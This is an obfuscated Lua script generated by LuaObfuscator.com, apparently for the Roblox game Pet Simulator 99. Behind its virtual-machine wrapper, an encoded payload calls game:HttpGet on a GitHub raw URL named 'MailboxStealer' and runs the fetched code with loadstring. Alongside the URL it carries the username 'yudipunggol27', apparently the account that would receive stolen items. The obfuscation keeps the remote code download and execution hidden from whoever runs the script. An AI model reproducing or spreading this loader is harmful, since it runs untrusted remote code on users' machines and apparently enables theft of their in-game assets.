--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0;local v32;while true do if (v31==(2 -(620 -(555 + 64)))) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + ((932 -(857 + 74)) -0) ;v31=2 -1 ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (570 -(367 + 201)) );v19=v19 + (929 -(214 + 713)) ;return (v34 * (65 + 191)) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=0;local v36;local v37;local v38;local v39;local v40;local v41;while true do if ((0 + 0)==v35) then v36=v24();v37=v24();v35=1;end if (((1317 -(145 + 293)) -(282 + 595))==v35) then v40=v21(v37,(2088 -(44 + 386)) -(1523 + 114) ,28 + 3 );v41=((v21(v37,32)==(1 -0)) and  -(1 + 0)) or (1066 -(68 + 997)) ;v35=8 -5 ;end if (v35==(1273 -(226 + 1044))) then if (v40==(0 -0)) then if (v39==(0 -0)) then return v41 * (0 -0) ;else v40=118 -((1518 -(998 + 488)) + 85) ;v38=0 + 0 + 0 ;end elseif (v40==(1677 + 370)) then return ((v39==(0 -0)) and (v41 * ((1 + 0)/(0 + 0)))) or (v41 * NaN) ;end return v8(v41,v40-(1980 -(892 + 65)) ) * (v38 + (v39/((6 -(776 -(201 + 571)))^((1261 -(116 + 1022)) -71)))) ;end if (v35==(1 -0)) then v38=(1844 -1401) -(245 + 171 + 26) ;v39=(v21(v37,1 -0 ,370 -(87 + 263) ) * (((664 -482) -(67 + (401 -288)))^(24 + 8))) + v36 ;v35=4 -2 ;end end end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==0) then return "";end end v43=v3(v16,v19,(v19 + v42) -(860 -(814 + 45)) );v19=v19 + v42 ;local v44={};for v69=2 -1 , #v43 do v44[v69]=v2(v1(v3(v43,v69,v69)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45==(10 -6)) then while true do if (v46~=1) then else local v98=0 + 0 ;while true do if (v98==0) then v49=nil;v50=nil;v98=242 -(187 + 54) ;end if ((781 -(162 + 618))==v98) then v46=2 + 0 ;break;end end end if (v46==2) then v51=nil;v52=nil;v46=3;end if (v46==(2 + 1)) then v53=nil;while true do local v100=0;local v101;local v102;while true do if (v100~=(0 -0)) then else v101=0 -0 ;v102=nil;v100=1;end if (v100==(1 + 0)) then while true do if (v101==0) then v102=1636 -(1373 + 263) ;while true do if (v102==0) then local v145=0;while true do if (v145~=1) then else v102=1;break;end if (v145==0) then if (v47==2) then local v169=0;while true do if (v169==(1001 -(451 + 549))) then for v179=1 + 0 ,v24() do local v180=0 -0 ;local v181;local v182;while true do if (v180==0) then v181=0 -0 ;v182=nil;v180=1385 -(746 + 638) ;end if (v180==(1 + 0)) then while true do if (v181~=(0 -0)) then else v182=v22();if (v21(v182,1,1)==(341 -(218 + 123))) then local v193=0;local v194;local v195;local v196;local v197;local v198;while true do if (v193~=(1582 -(1535 + 46))) then else v196=nil;v197=nil;v193=2 + 0 ;end if (v193~=(0 + 0)) then else v194=0;v195=nil;v193=1;end if (v193~=(562 -(306 + 254))) then else v198=nil;while true do if (v194==0) then v195=0 + 0 ;v196=nil;v194=1 -0 ;end if (v194==2) then while true do if (v195==(1470 -(899 + 568))) then if (v21(v197,2 + 1 ,7 -4 )==1) then v198[4]=v53[v198[4]];end v48[v179]=v198;break;end if (0~=v195) then else local v202=0;local v203;while true do if (v202==0) then v203=0;while true do if (v203~=(603 -(268 + 335))) then else local v210=290 -(60 + 230) ;while true do if (v210==1) then v203=1;break;end if (v210==0) then v196=v21(v182,574 -(426 + 146) ,3);v197=v21(v182,1 + 3 ,6);v210=1;end end end if (v203~=1) then else v195=1457 -(282 + 1174) ;break;end end break;end end end if (v195~=2) then else local v204=811 -(569 + 242) ;local v205;while true do if (v204~=0) then else v205=0 -0 ;while true do if (v205==(1 + 0)) then v195=3;break;end if (0~=v205) then else if (v21(v197,1,1025 -(706 + 318) )==(1252 -(721 + 530))) then v198[1273 -(945 + 326) ]=v53[v198[2]];end if (v21(v197,2,4 -2 )==1) then v198[3 + 0 ]=v53[v198[3]];end v205=701 -(271 + 429) ;end end break;end end end if (v195==(1 + 0)) then local v206=0;local v207;while true do if (v206==0) then v207=0;while true do if (v207==1) then v195=1502 -(1408 + 92) ;break;end if (v207==0) then local v211=0;while true do if (v211~=(1086 -(461 + 625))) then else v198={v23(),v23(),nil,nil};if (v196==(0 + 0)) then local v216=0;local v217;while true do if (0==v216) then v217=0;while true do if (0==v217) then v198[1 + 2 ]=v23();v198[2 + 2 ]=v23();break;end end break;end end elseif (v196==(1 + 0)) then v198[3]=v24();elseif (v196==2) then v198[532 -(406 + 123) ]=v24() -((1771 -(1749 + 20))^(4 + 12)) ;elseif (v196~=(1325 -(1249 + 73))) then else local v222=0 + 0 ;local v223;local v224;while true do if ((1146 -(466 + 679))==v222) then while true do if (v223==0) then v224=0;while true do if (v224==(0 -0)) then v198[8 -5 ]=v24() -((1902 -(106 + 1794))^16) ;v198[2 + 2 ]=v23();break;end end break;end end break;end if ((0 + 0)==v222) then local v225=0 -0 ;while true do if (v225==(2 -1)) then v222=115 -(4 + 110) ;break;end if (v225==(584 -(57 + 527))) then v223=1427 -(41 + 1386) ;v224=nil;v225=1;end end end end end v211=104 -(17 + 86) ;end if (1==v211) then v207=1 + 0 ;break;end end end end break;end end end end break;end if (v194~=1) then else v197=nil;v198=nil;v194=2;end end break;end end end break;end end break;end end end v47=6 -3 ;break;end if (0==v169) then local v176=0 -0 ;while true do if (v176==(166 -(122 + 44))) then for v187=1 -0 ,v52 do local v188=0;local v189;local v190;local v191;while true do if (0~=v188) then else v189=0 -0 ;v190=nil;v188=1 + 0 ;end if (v188~=(1 + 0)) then else v191=nil;while true do if (v189~=0) then else local v199=0 -0 ;while true do if (v199~=1) then else v189=1;break;end if (v199==0) then v190=v22();v191=nil;v199=66 -(30 + 35) ;end end end if ((1 + 0)~=v189) then else if (v190==(1258 -(1043 + 214))) then v191=v22()~=(0 -0) ;elseif (v190==2) then v191=v25();elseif (v190==3) then v191=v26();end v53[v187]=v191;break;end end break;end end end v51[1215 -(323 + 889) ]=v22();v176=1;end if (v176==1) then v169=2 -1 ;break;end end end end end if (v47==(580 -(361 + 219))) then local v170=0;local v171;while true do if (0~=v170) then else v171=0;while true do if (v171==0) then local v186=320 -(53 + 267) ;while true do if (v186==1) then v171=1;break;end if (v186==0) then v48={};v49={};v186=1 + 0 ;end end end if (v171==1) then v50={};v47=1;break;end end break;end end end v145=414 -(15 + 398) ;end end end if (v102~=(983 -(18 + 964))) then else if (v47==(3 -2)) then local v154=0;local v155;while true do if (v154~=0) then else v155=0;while true do if (v155==(1 + 0)) then v53={};v47=2 + 0 ;break;end if (v155==0) then local v177=0;local v178;while true do if (v177~=(850 -(20 + 830))) then else v178=0;while true do if (v178==(0 + 0)) then local v192=0;while true do if (0==v192) then v51={v48,v49,nil,v50};v52=v24();v192=1 + 0 ;end if (v192~=(739 -(542 + 196))) then else v178=1;break;end end end if (v178==1) then v155=1 -0 ;break;end end break;end end end end break;end end end if (v47==(1 + 2)) then local v156=0 + 0 ;local v157;while true do if (v156~=0) then else v157=0;while true do if (v157~=(0 + 0)) then else for v183=2 -1 ,v24() do v49[v183-1 ]=v29();end return v51;end end break;end end end break;end end break;end end break;end end end break;end if (v46~=(0 -0)) then else local v99=1551 -(1126 + 425) ;while true do if (v99==0) then v47=405 -(118 + 287) ;v48=nil;v99=3 -2 ;end if (1==v99) then v46=1;break;end end end end break;end if (v45~=2) then else v50=nil;v51=nil;v45=1124 -(118 + 1003) ;end if ((2 -1)~=v45) then else v48=nil;v49=nil;v45=379 -(142 + 235) ;end if (v45==0) then v46=0 -0 ;v47=nil;v45=1 + 0 ;end if (v45==3) then v52=nil;v53=nil;v45=981 -(553 + 424) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then local v71=0;while true do if (v71==0) then v20=v0(v3(v54,1,1));return "";end end else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v54,16));if v20 then local v103=v5(v73,v20);v20=nil;return v103;else return v73;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + (5 -2) );v19=v19 + 4 ;return (v58 * (14779330 + 1997886)) + (v57 * (65011 + 525)) + (v56 * (150 + 106)) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (1==v62) then v65=v59[3];return function(...)local v81=v63;local v82=v64;local v83=v65;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94>0) then local v108=0;local v109;local v110;while true do if (v108==1) then v91[v109 + 1 ]=v110;v91[v109]=v110[v93[4]];break;end if (v108==0) then v109=v93[2];v110=v91[v93[3]];v108=1;end end elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v61;else v91[v93[2]]=v61[v93[3]];end elseif (v94<=2) then for v117=v93[2],v93[3] do v91[v117]=nil;end elseif (v94==3) then do return;end else local v124=0;local v125;local v126;while true do if (1==v124) then v91[v125 + 1 ]=v126;v91[v125]=v126[v93[4]];break;end if (0==v124) then v125=v93[2];v126=v91[v93[3]];v124=1;end end end elseif (v94<=6) then if (v94==5) then local v111=0;local v112;while true do if (v111==0) then v112=v93[2];v91[v112]=v91[v112](v13(v91,v112 + 1 ,v86));break;end end elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v61;else v91[v93[2]]=v61[v93[3]];end elseif (v94<=7) then v91[v93[2]]=v93[3];elseif (v94==8) then local v130=0;local v131;local v132;local v133;local v134;while true do if (v130==0) then v131=v93[2];v132,v133=v84(v91[v131](v13(v91,v131 + 1 ,v93[3])));v130=1;end if (v130==1) then v86=(v133 + v131) -1 ;v134=0;v130=2;end if (v130==2) then for v165=v131,v86 do local v166=0;while true do if (v166==0) then v134=v134 + 1 ;v91[v165]=v132[v134];break;end end end break;end end else local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==1) then v86=(v138 + v136) -1 ;v139=0;v135=2;end if (0==v135) then v136=v93[2];v137,v138=v84(v91[v136](v13(v91,v136 + 1 ,v93[3])));v135=1;end if (v135==2) then for v167=v136,v86 do local v168=0;while true do if (v168==0) then v139=v139 + 1 ;v91[v167]=v137[v139];break;end end end break;end end end elseif (v94<=14) then if (v94<=11) then if (v94>10) then local v115=v93[2];v91[v115]=v91[v115](v13(v91,v115 + 1 ,v86));elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=12) then v91[v93[2]]();elseif (v94>13) then v85=v93[3];else v91[v93[2]]=v93[3];end elseif (v94<=16) then if (v94>15) then do return;end else v91[v93[2]]();end elseif (v94<=17) then for v119=v93[2],v93[3] do v91[v119]=nil;end elseif (v94==18) then v85=v93[3];elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end v85=v85 + 1 ;end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v74=0 + 0 ;local v75;while true do if (v74==(0 + 0)) then v75=(v66/(((9 -5) -2)^(v67-(2 -1))))%((1204 -(373 + 829))^(((v68-(2 -(732 -(476 + 255)))) -(v67-1)) + 1 + 0)) ;return v75-(v75%(4 -3)) ;end end else local v76=753 -(239 + 514) ;local v77;while true do if (v76==(0 + 0)) then v77=(1331 -(797 + 532))^(v67-(1 + 0)) ;return (((v66%(v77 + v77))>=v77) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end end end v15("LOL!073O00028O00026O00F03F030D3O007975646970756E2O676F6C3237030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403493O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6C612O6E7973742O656C2F50657453696D2O392F6D61696E2F4D61696C626F78537465616C657200183O00120D3O00014O0011000100023O00260A3O00070001000100040E3O0007000100120D000100014O0011000200023O00120D3O00023O00260A3O00020001000200040E3O0002000100260A000100090001000100040E3O0009000100120D000200033O00122O000300043O00122O000400053O00200400040004000600120D000600074O0009000400064O000B00033O00022O000C00030001000100040E3O0017000100040E3O0009000100040E3O0017000100040E3O000200012O00033O00017O00",v9(),...);
